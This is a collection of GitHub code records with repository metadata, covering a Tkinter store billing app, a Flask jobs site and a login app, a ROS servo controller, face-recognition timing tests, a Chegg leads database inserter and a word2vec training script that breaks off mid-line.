self.change_butn.place(x=350, y=590)\n\n #generate bill\n self.bill_btn = Button(self.left, text='Generate Bill', width=100, height=2, bg='red', fg='white', command=self.generate_bill)\n self.bill_btn.place(x=0, y=640)\n\n def add_to_cart(self, *args, **kwargs):\n self.quantity_value = int(self.quantity_e.get())\n if self.quantity_value > int(self.get_stock):\n tkinter.messagebox.showinfo(\"Out of Stock\", \"Less in Stocks.\")\n else:\n self.final_price = float(self.quantity_value)*float(self.get_price) - (float(self.discount_e.get()))\n product_list.append(self.get_name)\n product_price.append(self.final_price)\n product_quantity.append(self.quantity_value)\n product_id.append(self.get_id)\n\n self.x_index = 0\n self.y_index = 100\n self.counter = 0\n for self.p in product_list:\n self.tempName = Label(self.right, text=str(product_list[self.counter]),\n font=('arial 18 bold'), bg='lightblue', fg='white')\n self.tempName.place(x=0, y=self.y_index)\n 
labels_list.append(self.tempName)\n\n self.tempqt = Label(self.right, text=str(product_quantity[self.counter]),\n font=('arial 18 bold'), bg='lightblue', fg='white')\n self.tempqt.place(x=300, y=self.y_index)\n labels_list.append(self.tempqt)\n\n\n self.tempprice = Label(self.right, text=str(product_price[self.counter]),\n font=('arial 18 bold'), bg='lightblue', fg='white')\n self.tempprice.place(x=500, y=self.y_index)\n labels_list.append(self.tempprice)\n\n\n\n self.y_index += 40\n self.counter += 1\n\n self.total_label.configure(text=\"Total: Rs= \"+str(sum(product_price)))\n\n self.quantity_1.place_forget()\n self.quantity_e.place_forget()\n self.discount_1.place_forget()\n self.discount_e.place_forget()\n\n self.productname.configure(text='')\n self.pprice.configure(text='')\n self.add_to_btn.destroy()\n\n self.enteride.focus()\n self.enteride.delete(0, END)\n\n def change(self, *args, **kwargs):\n self.amount_given = float(self.change_e.get())\n self.our_total = float(sum(product_price))\n self.to_give = self.amount_given - self.our_total\n self.c_ammount = Label(self.left, text=\"Change: Rs= \" + str(self.to_give), font=('arial 18 bold'), fg='red', bg='white')\n self.c_ammount.place(x=0, y=600)\n self.chaneisThere = 0\n\n def generate_bill(self, *args, **kwargs):\n directory = \"C:/Projects/Python/Store Management Software/Invoice/\" + str(date) + \"/\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n #Template for Bill\n company = \"\\t\\t\\t\\tSagar Market Pvt. Ltd.\\n\"\n address = \"\\t\\t\\t\\tITER, SOA University, Jagamohan Nagar\\n\"\n phone = \"\\t\\t\\t\\t\\t0123456789\\n\"\n sample = \"\\t\\t\\t\\t\\tInvoice\\n\"\n dt = \"\\t\\t\\t\\t\\t\" + str(date)\n\n table_header = \"\\n\\n\\t\\t-----------------------------------------\\n\\t\\tSN.\\tProducts\\tQty\\tAmount\\n\\t\\t\" \\\n \"-----------------------------------------\"\n final = company + address + phone + sample + dt + \"\\n\" + table_header\n file_name = str(directory) + str(random.randrange(5000, 10000)) + \".rtf\"\n f = open(file_name, 'w')\n f.write(final)\n\n r=1\n i=0\n for t in product_list:\n f.write(\"\\n\\t\\t\" + str(r) + \"\\t\" + str(product_list[i] + \".......\")[:7] + \"\\t\" +\n str(product_quantity[i]) + \"\\t\" + str(product_price[i]))\n i += 1\n r += 1\n f.write(\"\\n\\t\\t\\tTotal: Rs. \" + str(sum(product_price)))\n f.write(\"\\n\\t\\t\\tThanks for Visiting. \")\n\n os.startfile(file_name, \"print\") #PRINTING COMMAND LINE\n f.close()\n\n #decrease stocks\n self.x = 0\n\n initial = \"SELECT * FROM inventory WHERE id=?\"\n\n for i in product_list:\n # Re-query the current stock for each purchased product (the query previously ran only once).\n result = c.execute(initial, (product_id[self.x],))\n for r in result:\n self.old_stock = r[2]\n\n # Decrement the stock that was just read, not the stock of the last searched item.\n self.new_stock = int(self.old_stock) - int(product_quantity[self.x])\n sql = \"UPDATE inventory SET stock=? 
WHERE id=?\"\n c.execute(sql,(self.new_stock, product_id[self.x]))\n conn.commit()\n\n sql2 = \"INSERT INTO transactions (product_name, quantity, amount, date) VALUES(?, ?, ?, ?)\"\n c.execute(sql2, (product_list[self.x], product_quantity[self.x], product_price[self.x], date))\n conn.commit()\n self.x += 1\n\n for a in labels_list:\n a.destroy()\n del(product_list[:])\n del(product_quantity[:])\n del(product_price[:])\n del(product_id[:])\n self.total_label.configure(text='')\n if self.chaneisThere == 0:\n self.c_ammount.configure(text='')\n self.change_e.delete(0, END)\n self.enteride.focus()\n\n tkinter.messagebox.showinfo(\"Success\", \"Happy Shopping\")\n\n\n\n\n\n\n\nroot = Tk()\nb = Application(root)\nroot.geometry('1368x768+0+0')\nroot.mainloop()","repo_name":"SagarPatra01/Python--based-Store-Management-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"22670217635","text":"#-*- coding:utf-8 -*-\nfrom config import THE_ANTENNA_NUM,antenna_list,THE_RESTORE_NUM,THE_DATA_SOURCE\nimport os\ndef dataRestore(position):\n \"\"\"\n this func will be used to eliminate the strange value in the ph \n in the select sentences.\n use the last value in the list and the abs of the (last value - current value )\n is the boundy of the strange value.\n it's tough.\n And the file will be restore at the seq(means sequence )\n every 50 lines as a slot.\n postion is the last tell return value\n \"\"\"\n path = THE_DATA_SOURCE\n cwd = path.split('/')#get the current work directory\n mkdir = THE_DATA_SOURCE + 'seq'\n mkdir_matlab = THE_DATA_SOURCE + 'matlab'\n cleandata = []\n #print(mkdir) # It is used to check the mkdir path \n if os.path.exists(mkdir):\n pass # if the dir is exists\n else:\n os.mkdir(mkdir)\n os.mkdir(mkdir_matlab)\n #print(cwd,mkdir) #this is used to test the path\n for antnum in range(THE_ANTENNA_NUM):\n txt_name=['Fre920.625','Antenna2','Antenna3','Antenna4']\n txt_restore=['Antenna1','Antenna2','Antenna3','Antenna4']\n dir = path+txt_name[antnum]+'.txt'\n # print(dir) # this is used to test the file\n count = 0 # every 50 lines as a block\n with open(mkdir+'/'+txt_restore[antnum]+'.txt','w') as file_in:\n with open(mkdir_matlab+'/'+txt_restore[antnum]+'.txt','w') as file_matlab:\n with open(dir,'r')as file_out: # this is the data sources\n file_out.seek(position[antnum],0)\n # for line in file_out:\n while count < THE_RESTORE_NUM:\n line = file_out.readline()\n sample = line.split('\\t')\n cleandata.append(float(sample[0]))\n # file_in.writelines(sample[0]+'\\n')\n # file_matlab.writelines(sample[0]+'\\t'+sample[1]+'\\n')\n count = count + 1\n else :\n position[antnum]= file_out.tell()\n\n cleandata = sorted(cleandata)\n half = THE_RESTORE_NUM//2\n if abs(cleandata[half]-cleandata[-1]) > 3:\n for i in range(half):\n file_in.writelines(str(cleandata[i])+'\\n')\n file_matlab.writelines(str(cleandata[i])+'\\t'+'1'+'\\n')\n else:\n for i in range(half,THE_RESTORE_NUM):\n file_in.writelines(str(cleandata[i])+'\\n')\n file_matlab.writelines(str(cleandata[i])+'\\t'+'1'+'\\n')\n \n cleandata.clear()\n return position \n\n\n\nif __name__==\"__main__\":\n position = dataRestore([0,0,0,0])\n 
print(position)","repo_name":"HMLG/NISL","sub_path":"Engine/preventFromStrangeValue.py","file_name":"preventFromStrangeValue.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"10565599798","text":"import random\nimport os\n\nprint(\"Welcome to Test Generator\")\n\nprint(\"How many Tests to create for you?\")\ntest_amount = int(input())\n\n# Create list to insert the questions from the txt file\ncontainerQes = []\nwith open(\"soccer_questions.txt\", \"r\") as my_Container:\n for q in my_Container:\n containerQes.append(q)\n\n# Add to each file 4 questions\nfor i in range(test_amount):\n with open(F\"Test{i + 1}.txt\", \"a\") as test_file:\n strQues = ''\n lines = random.sample(containerQes, 4)\n strQues = ''.join(lines)\n test_file.write(strQues)\n test_file.close()\n\ni = 1\nwhile os.path.exists(F\"Test{i}.txt\"):\n print(F\"----Test {i}----\\n\")\n with open(F\"Test{i}.txt\", \"r\") as my_file:\n j = 1\n for line in my_file:\n print(F\"{str(j)}. {line}\")\n j += 1\n i = i + 1\n","repo_name":"netanel152/Python_Tasks","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32972344663","text":"from tkinter import Button, PhotoImage\n\nimport const\n\n\nclass Buttons:\n\n def __init__(self):\n self.right_image = PhotoImage(file=\"./images/right.png\")\n self.wrong_image = PhotoImage(file=\"./images/wrong.png\")\n self.right_button = Button(image=self.right_image)\n self.right_button.config(bg=const.BACKGROUND_COLOR, highlightthickness=0, borderwidth=0)\n self.wrong_button = Button(image=self.wrong_image)\n self.wrong_button.config(bg=const.BACKGROUND_COLOR, highlightthickness=0, borderwidth=0)\n\n","repo_name":"yt5ytt/100DaysOfPythonCourse","sub_path":"Day31-FlashCardApp/buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"5802806851","text":"import digitalio\r\nimport board\r\nimport time\r\n\r\nled = digitalio.DigitalInOut(board.LED)\r\nled.direction = digitalio.Direction.OUTPUT\r\nwhile True:\r\n print(\"On\")\r\n led.value = True\r\n time.sleep(0.5)\r\n print(\"Off\")\r\n led.value = False\r\n time.sleep(0.5)\r\n","repo_name":"hajimef/circuitpython_picow_sample","sub_path":"blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7714845210","text":"from flask import Flask, render_template, jsonify\r\n\r\napp = Flask(__name__)\r\n\r\n\r\nJOBS = [\r\n {\"id\": 1, \"title\": \"Data Analyst\", \"location\": \"RJ, Brazil\", \"salary\": \"R$4.000\"},\r\n {\"id\": 2, \"title\": \"Data Scientist\", \"location\": \"BH, Brazil\", \"salary\": \"R$5.000\"},\r\n {\"id\": 3, \"title\": \"Frontend Engineer\", \"location\": \"Remote\", \"salary\": \"R$10.000\"},\r\n {\r\n \"id\": 4,\r\n \"title\": \"Backend Engineer\",\r\n \"location\": \"SP, Brazil\",\r\n \"salary\": \"R$3.000\",\r\n },\r\n {\r\n \"id\": 5,\r\n \"title\": \"Fullstack Developer\",\r\n \"location\": \"SP, Brazil\",\r\n },\r\n]\r\n\r\n\r\n@app.route(\"/\")\r\ndef hello_world():\r\n return render_template(\"home.html\", jobs=JOBS, company=\"Xaropinho\")\r\n\r\n\r\n@app.route(\"/api/jobs\")\r\ndef list_jobs():\r\n return 
jsonify(JOBS)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host=\"0.0.0.0\", debug=True)\r\n","repo_name":"AntonioMarcel/treinamento-flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6236106485","text":"def sudoku2(grid):\n for row in range(9):\n if validRow(grid,row) ==False:\n return False\n for col in range(9):\n if validCol(grid,col) == False:\n return False\n \n for row in range(0,9,3):\n for col in range(0,9,3):\n if validBox(grid,row,col) ==False:\n return False\n return True \n \ndef validRow(grid,row):\n checkList = []\n for i in range(9):\n if grid[row][i] in checkList:\n return False\n elif grid[row][i] !='.':\n checkList.append(grid[row][i])\n return True\n \ndef validCol(grid,col):\n checkList =[]\n for i in range(9):\n if grid[i][col] in checkList:\n return False\n elif grid[i][col] !='.':\n checkList.append(grid[i][col])\n return True\n \ndef validBox(grid,startRow,startCol):\n checkList = []\n for row in range(3):\n for col in range(3):\n boxVal = grid[startRow+row][startCol+col]\n if boxVal in checkList:\n return False\n elif boxVal != '.':\n checkList.append(boxVal)\n return True\n","repo_name":"Zahidsqldba07/sudoku2","sub_path":"sudoku2.py","file_name":"sudoku2.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4653568809","text":"import os\nfrom ast import literal_eval\nfrom pathlib import Path\n\nimport numpy as np\n\n\ndef read_info(filename: os.PathLike) -> dict:\n \"\"\"Read volume metadata.\n\n Parameters\n ----------\n filename : PathLike\n Path to the file.\n\n Returns\n -------\n dct : dict\n Dictionary with the metadata.\n \"\"\"\n dct = {}\n with open(filename, 'r') as f:\n for line in f:\n line = line.strip()\n\n if not line:\n continue\n\n if line.startswith('!'):\n continue\n\n key, val = line.split('=')\n\n key = key.strip()\n val = val.strip()\n\n try:\n val = literal_eval(val)\n except ValueError:\n pass\n\n dct[key] = val\n\n return dct\n\n\ndef load_vol(filename: os.PathLike,\n dtype=np.float32,\n mmap_mode: str = None,\n shape: tuple = None) -> np.ndarray:\n \"\"\"Load data from `.vol` file.\n\n The image shape is deduced from the `.vol.info` file. If this file is\n not present, the shape can be specified using the `shape` keyword.\n\n Parameters\n ----------\n filename : os.PathLike\n Path to the file.\n dtype : dtype, optional\n Numpy dtype of the data.\n mmap_mode : None, optional\n If not None, open the file using memory mapping. 
For more info on\n the modes, see: :func:`numpy.memmap`\n shape : tuple, optional\n Tuple of three ints specifying the shape of the data (order: z, y, x).\n\n Returns\n -------\n result : numpy.ndarray\n Data stored in the file.\n \"\"\"\n filename = Path(filename)\n\n if not filename.exists():\n raise IOError(f'No such file: {filename}')\n\n try:\n filename_info = filename.with_suffix(filename.suffix + '.info')\n if not shape:\n info = read_info(filename_info)\n shape = info['NUM_Z'], info['NUM_Y'], info['NUM_X']\n except FileNotFoundError:\n raise ValueError(\n f'Info file not found: {filename_info.name}, specify '\n 'the volume shape using the `shape` parameter.') from None\n\n result: np.ndarray\n\n if mmap_mode:\n result = np.memmap(filename, dtype=dtype, shape=shape,\n mode=mmap_mode) # type: ignore\n else:\n result = np.fromfile(filename, dtype=dtype)\n result = result.reshape(shape)\n\n return result\n","repo_name":"hpgem/nanomesh","sub_path":"nanomesh/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"27"} +{"seq_id":"17536027147","text":"from flask import Flask, Blueprint, render_template\nfrom flask_wtf import CSRFProtect\n\nfrom views.models import mongo, login_manager\n\nfrom views.auth import auth\nfrom views.errors import errors\n\nimport views.errors as error\n\napp = Flask(__name__)\n\n# Enter your MongoDB URI here.\napp.config['MONGO_URI'] = 'mongodb://localhost:27017/speedApp'\n\napp.config['SECRET_KEY'] = 'jdn4mmyxaIkqjcuYrliR5ojf8Cfi6X'\n\nmongo.init_app(app)\n\nlogin_manager.login_view = 'auth.login'\nlogin_manager.init_app(app)\nCSRFProtect(app)\n\n\napp.register_blueprint(auth)\napp.register_blueprint(errors)\napp.register_error_handler(404,error.page_not_found)\n\n@app.route('/')\ndef index():\n return render_template('auth/index.html')\n\nif __name__ == \"__main__\":\n app.run(debug = True)","repo_name":"mathaimon/flask-mongo-login","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1688995131","text":"#!/usr/bin/env python\nimport rospy\nfrom hexapod_servo.msg import ServoCommand\n\nfrom serial import Serial, SerialException\n\n####################################################################################################\n\nclass ServoController(object):\n\tdef __init__(self):\n\t\trospy.init_node('servo_controller')\n\n\t\ttry:\n\t\t\tself.__serial = Serial('/dev/ttyACM0', 9600)\n\t\t\trospy.sleep(1)\n\n\t\t\t#for i in range(32):\n\t\t\t#\tself.__move(i, 90)\n\n\t\t\t#rospy.sleep(1)\n\t\texcept SerialException as e:\n\t\t\trospy.logfatal(\"Could not open serial port.\")\n\t\t\texit(1)\n\n\t\trospy.Subscriber('direct', ServoCommand, self.move_callback)\n\t\trospy.spin()\n\n\t################################################################################################\n\n\tdef move_callback(self, data):\n\t\tif data.angle < 0 or data.angle > 180:\n\t\t\trospy.logerr('Tried to set servo #' + str(data.index) + ' out of bounds (' + \n\t\t\t\tstr(data.angle) + ' degrees).')\n\t\t\treturn\n\n\t\tself.__move(data.index, data.angle, data.duration)\n\n\t################################################################################################\n\n\tdef __move(self, index, angle, duration = 0.1):\n\t\tmove_string = ServoController.__move_string(index, angle, 
duration)\n\n\t\tself.__serial.write(move_string)\n\t\tself.__serial.flush()\n\t\trospy.sleep(0.003)\n\n\t################################################################################################\n\n\t@staticmethod\n\tdef __move_string(index, angle, duration):\n\t\tif duration < 0.1:\n\t\t\tduration = 0.1\n\n\t\tpulse_duration = int(((angle / 180.0) * (2500 - 500))) + 500\n\t\tmove_time = int(duration * 1000)\n\n\t\treturn '#' + str(index + 1) + 'P' + str(pulse_duration) + 'T' + str(move_time) + '\\r\\n'\n\n####################################################################################################\n\nif __name__ == '__main__':\n\tServoController()\n","repo_name":"Knifa/HexapodKit","sub_path":"ROS/src/hexapod_hw/scripts/hexapod_hw/servo_controller.py","file_name":"servo_controller.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"de","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"20324360281","text":"\nimport sys\ninput = sys.stdin.readline\n\nN, K = map(int, input().split())\nNS = []\nfor i in range(N):\n NS.append(int(input().strip()))\n\n##\nanswer = 0\nfor i in range(N-1, -1, -1):\n \n if NS[i] <= K:\n answer += K//NS[i]\n K = K%NS[i]\n \n if K == 0:\n break\nprint(answer)","repo_name":"LewisVille-flow/Algorithm_PS","sub_path":"BOJ/11047.py","file_name":"11047.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30875094415","text":"# 1931번 회의실 배정\n'''\nN개의 회의에 대하여 회의실 사용표를 만들려고 한다. \n각 회의 I에 대해 시작시간과 끝나는 시간이 주어져 있고,\n각 회의가 겹치지 않게 하면서 회의실을 사용할 수 있는 회의의 최대 개수를 찾아보자. \n단, 회의는 한번 시작하면 중간에 중단될 수 없으며 한 회의가 끝나는 것과 동시에 다음 회의가 시작될 수 있다.\n회의의 시작시간과 끝나는 시간이 같을 수도 있다. \n'''\n# 접근방법\n'''\n- 시작 시간이 빠른 순으로 정렬한다(heapq?)\n- 반대로 끝나는 시간이 빠른 순으로 정렬하면?\n'''\nimport sys\ninput = sys.stdin.readline\nn = int(input()) # 회의실 수\nclass_ = []\n\nfor _ in range(n):\n start, end = map(int, input().split())\n class_.append((start, end))\nclass_.sort(key = lambda x: (x[1], x[0]))\n# print(class_)\ncnt = 1\ne = class_[0][1]\nfor i in range(1, n):\n # i의 시작시간이 이전 끝나는 시간과 같거나 이후라면,\n if class_[i][0] >= e:\n # 회의 추가해주고, 기존 끝나는 시간을 현 강의의 끝나는 시간으로 바꿔주기\n cnt += 1\n e = class_[i][1]\nprint(cnt)","repo_name":"Choi-jw-96/Algo-","sub_path":"9Week_Free/1931/1931_hany.py","file_name":"1931_hany.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"30243719037","text":"from Classes.SUDBConnect import SUDBConnect\nimport time\nimport re\n\n\nclass InsertCheggLeadArrayIntoCheggLeadsDB(object):\n def __init__(self, cheggLeadArray, fundingClassification, badScholarshipClassification):\n self.cheggLeadArray = cheggLeadArray\n self.fundingClassification = fundingClassification\n self.badScholarshipClassificaion = badScholarshipClassification\n self.db = SUDBConnect()\n self.fileSystemDB = SUDBConnect(destination='filesystem')\n\n self.name = self.cheggLeadArray[0]\n self.url = self.cheggLeadArray[1]\n self.deadline = self.cheggLeadArray[2]\n self.amount = self.cheggLeadArray[3]\n self.eligibility = self.cheggLeadArray[4]\n self.applicationOverview = self.cheggLeadArray[5]\n self.description = self.cheggLeadArray[6]\n self.sponsor = self.cheggLeadArray[7]\n self.sourceWebsite = self.cheggLeadArray[8]\n self.sourceText = self.cheggLeadArray[9]\n self.date = time.strftime('%Y%m%d')\n\n def writeFileToDisk(self):\n tableName = 'CheggLeads'\n user = 'Kya'\n website = 
re.sub('Leads', '', tableName)\n columns = self.db.getColumnNamesFromTable(tableName)\n currentRow = self.db.getRowsDB(\n \"select * from dbo.CheggLeads where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")[0]\n self.fileSystemDB.writeFile(columns, currentRow, user, website, self.url, self.date)\n\n def checkIfAlreadyInDatabase(self):\n matchingRow = self.db.getRowsDB(\n \"select * from dbo.CheggLeads where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")\n if matchingRow != []:\n return True\n else:\n return False\n\n def insertUpdateLead(self):\n if not self.checkIfAlreadyInDatabase():\n self.db.insertUpdateOrDeleteDB(\n \"insert into dbo.CheggLeads (Name, Url, Deadline, Amount, Eligibility, ApplicationOverview, Description, Sponsor, SourceWebsite, SourceText, Date, Tag, BadScholarship) values (N'\" + self.name + \"', N'\" + self.url + \"', N'\" + self.deadline + \"', N'\" + self.amount + \"', N'\" + self.eligibility + \"', N'\" + self.applicationOverview + \"', N'\" + self.description + \"', N'\" + self.sponsor + \"', N'\" + self.sourceWebsite + \"', N'\" + self.sourceText + \"', '\" + self.date + \"', '\" + self.fundingClassification + \"', '\" + self.badScholarshipClassificaion + \"')\")\n self.writeFileToDisk()\n return True\n else:\n self.db.insertUpdateOrDeleteDB(\n \"update dbo.CheggLeads set Deadline=N'\" + self.deadline + \"', Amount=N'\" + self.amount + \"', Eligibility=N'\" + self.eligibility + \"', ApplicationOverview=N'\" + self.applicationOverview + \"', Description=N'\" + self.description + \"', Sponsor=N'\" + self.sponsor + \"', SourceWebsite=N'\" + self.sourceWebsite + \"', SourceText=N'\" + self.sourceText + \"', Date='\" + self.date + \"', Tag='\" + self.fundingClassification + \"', BadScholarship='\" + self.badScholarshipClassificaion + \"' where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")\n self.writeFileToDisk()\n return False\n","repo_name":"kyajpauley/cerebro","sub_path":"Classes/InsertCheggLeadArrayIntoCheggLeadsDB.py","file_name":"InsertCheggLeadArrayIntoCheggLeadsDB.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11157655248","text":"import face_recognition\nimport cv2\nimport numpy\nimport time\nimport dlib\nimport imutils\n\n\n# Load the jpg files into numpy arrays\nbiden_image = face_recognition.load_image_file(\"7.jpg\")\nobama2_image = face_recognition.load_image_file(\"5.jpg\")\nobama_image = face_recognition.load_image_file(\"1.jpg\")\nunknown_image = face_recognition.load_image_file(\"2.jpg\")\n\n# Get the face encodings for each face in each image file\n# Since there could be more than one face in each image, it returns a list of encodings.\n# But since I know each image only has one face, I only care about the first encoding in each image, so I grab index 0.\ntry:\n print(time.time())\n biden_face_encoding = face_recognition.face_encodings(biden_image)[0]\n print(time.time())\n obama_face_encoding = face_recognition.face_encodings(obama_image)[0]\n unknown_face_encoding = face_recognition.face_encodings(unknown_image)[1]\nexcept IndexError:\n print(\"I wasn't able to locate any faces in at least one of the images. Check the image files. 
Aborting...\")\n quit()\n\nknown_faces = [\n biden_face_encoding,\n obama_face_encoding\n]\n\ndetector = dlib.get_frontal_face_detector()\n\nimg_raw = biden_image\nsmall_frame = cv2.resize(img_raw, (0, 0), fx=0.25, fy=0.25)\nrgb_small_frame = small_frame[:, :, ::-1]\nprint(time.time())\nfaces = face_recognition.face_locations(rgb_small_frame)\nprint(time.time())\nprint(faces)\n#-------------------\nprint('---------')\nprint(time.time())\nimg_raw = biden_image\nsmall_frame = cv2.resize(img_raw, (0, 0), fx=0.25, fy=0.25)\ngray = cv2.cvtColor(small_frame, cv2.COLOR_BGR2GRAY)\nrects = detector(gray, 1)\nprint(time.time())\nprint(rects)\n\nprint(time.time())\nface_encodings = face_recognition.face_encodings(rgb_small_frame, faces)\nprint(time.time())\n\n#-------------------\nprint('---------')\nprint(time.time())\nimg_raw = obama2_image\nsmall_frame = cv2.resize(img_raw, (0, 0), fx=0.25, fy=0.25)\ngray = cv2.cvtColor(small_frame, cv2.COLOR_BGR2GRAY)\nrects = detector(gray, 1)\nprint(time.time())\nprint(rects)\n\nprint(time.time())\nface_encodings = face_recognition.face_encodings(rgb_small_frame, faces)\nprint(time.time())\n# results is an array of True/False telling if the unknown face matched anyone in the known_faces array\nresults = face_recognition.compare_faces(known_faces, unknown_face_encoding)\nprint(results)\n\nprint(\"Is the unknown face a picture of Biden? {}\".format(results[0]))\nprint(\"Is the unknown face a picture of Obama? {}\".format(results[1]))\nprint(\"Is the unknown face a new person that we've never seen before? {}\".format(not True in results))\n","repo_name":"linchiyu/learning","sub_path":"face_recognition/facerecog/testfr.py","file_name":"testfr.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41177936990","text":"import sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as tud\nfrom torch.nn.parameter import Parameter\n\nfrom collections import Counter\nimport numpy as np\nimport random\nimport math\n\nimport pandas as pd\nimport scipy\nimport sklearn\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n# this parameter decides whehter this code runs on GPU or CPU\n# the speed of CPU is slower than GPU\nUSE_CUDA = torch.cuda.is_available()\n\n# 为了保证复现,random seed固定\nrandom.seed(53113)\nnp.random.seed(53113)\ntorch.manual_seed(53113)\nif USE_CUDA:\n torch.cuda.manual_seed(53113)\n\n# 超参数\n# 一个正样本对应100个负样本\nK = 100 # number of negative samples\n#窗口大小\nC = 3 # nearby words threshold\nNUM_EPOCHS = 2 # The number of epochs of training\n#取3万个高频单词,不需要所有词汇都学习\nMAX_VOCAB_SIZE = 30000 # the vocabulary size\nBATCH_SIZE = 128 # the batch size\nLEARNING_RATE = 0.2 # the initial learning rate\nEMBEDDING_SIZE = 100\n\nLOG_FILE = \"./log/word-embedding.log\"\n\n# 分词\ndef word_tokenize(text):\n return text.split()\n\nwith open(\"./data/text8\", \"r\") as fin:\n text = fin.read()\n\ntext = [w for w in word_tokenize(text.lower())]\n\nvocab = dict(Counter(text).most_common(MAX_VOCAB_SIZE - 1))\n# 所有低频词用unk表示\nvocab[\"\"] = len(text) - np.sum(list(vocab.values()))\n#将单词id化\nidx_to_word = [word for word in vocab.keys()]\nword_to_idx = {word: i for i, word in enumerate(idx_to_word)}\n# 计算单词词频,为后面负采样做准备\nword_counts = np.array([count for count in vocab.values()], dtype=np.float32)\nword_freqs = word_counts / np.sum(word_counts)\nword_freqs = word_freqs ** (3. 
/ 4.)\nword_freqs = word_freqs / np.sum(word_freqs) # 用来做 negative sampling\nVOCAB_SIZE = len(idx_to_word)\n\nprint(VOCAB_SIZE)\n\nclass WordEmbeddingDataset(tud.Dataset):\n def __init__(self, text, word_to_idx, idx_to_word, word_freqs, word_counts):\n ''' text: a list of words, all text from the training dataset\n word_to_idx: the dictionary from word to idx\n idx_to_word: idx to word mapping\n word_freq: the frequency of each word\n word_counts: the word counts\n '''\n super(WordEmbeddingDataset, self).__init__()\n self.text_encoded = [word_to_idx.get(t, VOCAB_SIZE - 1) for t in text]\n self.text_encoded = torch.Tensor(self.text_encoded).long()\n self.word_to_idx = word_to_idx\n self.idx_to_word = idx_to_word\n self.word_freqs = torch.Tensor(word_freqs)\n self.word_counts = torch.Tensor(word_counts)\n\n def __len__(self):\n ''' 返回整个数据集(所有单词)的长度\n '''\n return len(self.text_encoded)\n\n def __getitem__(self, idx):\n ''' 这个function返回以下数据用于训练\n - 中心词\n - 这个单词附近的(positive)单词\n - 随机采样的K个单词作为negative sample\n '''\n center_word = self.text_encoded[idx]\n # C是窗口大小\n pos_indices = list(range(idx - C, idx)) + list(range(idx + 1, idx + C + 1))\n # 对i求余数的原因是最左边可能是负数,因为如果中心词是第一个的话\n pos_indices = [i % len(self.text_encoded) for i in pos_indices]\n # 对text编码,即往tensor去映射\n pos_words = self.text_encoded[pos_indices]\n # 根据单词频率随机取负样本,每个正样本取K个负样本\n neg_words = torch.multinomial(self.word_freqs, K * pos_words.shape[0], True)\n\n return center_word, pos_words, neg_words\n\ndataset = WordEmbeddingDataset(text, word_to_idx, idx_to_word, word_freqs, word_counts)\ndataloader = tud.DataLoader(dataset, batch_size=BATCH_SIZE, shuffle=True, num_workers=4)\n\nclass EmbeddingModel(nn.Module):\n def __init__(self, vocab_size, embed_size):\n ''' 初始化输出和输出embedding\n '''\n super(EmbeddingModel, self).__init__()\n self.vocab_size = vocab_size\n self.embed_size = embed_size\n\n initrange = 0.5 / self.embed_size\n self.out_embed = nn.Embedding(self.vocab_size, self.embed_size, sparse=False)\n self.out_embed.weight.data.uniform_(-initrange, initrange)\n\n self.in_embed = nn.Embedding(self.vocab_size, self.embed_size, sparse=False)\n self.in_embed.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, input_labels, pos_labels, neg_labels):\n '''\n input_labels: 中心词, [batch_size]\n pos_labels: 中心词周围 context window 出现过的单词 [batch_size * (window_size * 2)]\n neg_labelss: 中心词周围没有出现过的单词,从 negative sampling 得到 [batch_size, (window_size * 2 * K)]\n\n return: loss\n '''\n\n input_embedding = self.in_embed(input_labels) # B * embed_size\n pos_embedding = self.out_embed(pos_labels) # B * (2*C) * embed_size\n neg_embedding = self.out_embed(neg_labels) # B * (2*C * K) * embed_size\n print(\"input_embedding size:\", input_embedding.size())\n print(\"pos_embedding size:\", pos_embedding.size())\n print(\"neg_embedding size:\", neg_embedding.size())\n # 通过unsqueeze强行增加了一个第三维度(0是行,1是列,2是第三个维度),维度相同,后面才能进行求和计算\n log_pos = torch.bmm(pos_embedding, input_embedding.unsqueeze(2)).squeeze() # B * (2*C)\n log_neg = torch.bmm(neg_embedding, 